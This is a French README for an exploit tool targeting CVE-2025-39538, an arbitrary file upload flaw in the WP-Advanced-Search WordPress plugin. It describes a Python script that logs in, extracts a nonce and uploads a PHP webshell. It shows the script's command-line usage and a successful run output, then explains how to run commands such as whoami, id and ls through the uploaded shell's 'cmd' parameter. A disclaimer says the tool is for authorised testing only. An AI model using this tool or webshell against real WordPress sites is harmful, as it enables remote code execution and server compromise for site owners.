
WordPress WP-Advanced-Search <= 3.3.9.3 - Vulnérabilité de téléchargement de fichier arbitraire
CVE-2025-39538
Publié : 2025-04-16
Type de vulnérabilité : Téléchargement arbitraire de fichier (Téléchargement sans restriction de fichier de type dangereux)
Plugin concerné : WP-Advanced-Search par Mathieu Chartier
Versions concernées : Toutes les versions jusqu'à 3.3.9.3 inclus
Cette vulnérabilité permet à un attaquant authentifié de télécharger un fichier PHP malveillant (tel qu'un webshell) sur le serveur en utilisant la fonctionnalité d'importation fournie par le plugin. Le fichier téléchargé est placé dans le répertoire des téléchargements de WordPress et pourrait conduire à une exécution de code à distance.
🧱 Chemin de téléchargement :
wp-content/uploads/2025/04/
Ce script Python effectue les actions suivantes :
wp_advanced_search_up_nonce requis depuis la page d'administration import/export.usage: a.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://127.0.0.1/wordpress)
-un, --username USERNAME
WordPress Username
-p, --password PASSWORD
WordPress Password
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).
Après le téléchargement, vous pouvez accéder à votre shell comme ceci :
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami
Remplacez whoami par n'importe quelle commande Linux que vous souhaitez exécuter, par exemple :
id — affiche l'ID de l'utilisateur actuel.pwd — affiche le répertoire actuel.ls — liste les fichiers.Cet outil est destiné uniquement à des fins éducatives et de tests de sécurité autorisés.
L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce script.
Par : Nxploited | Khaled Alenazi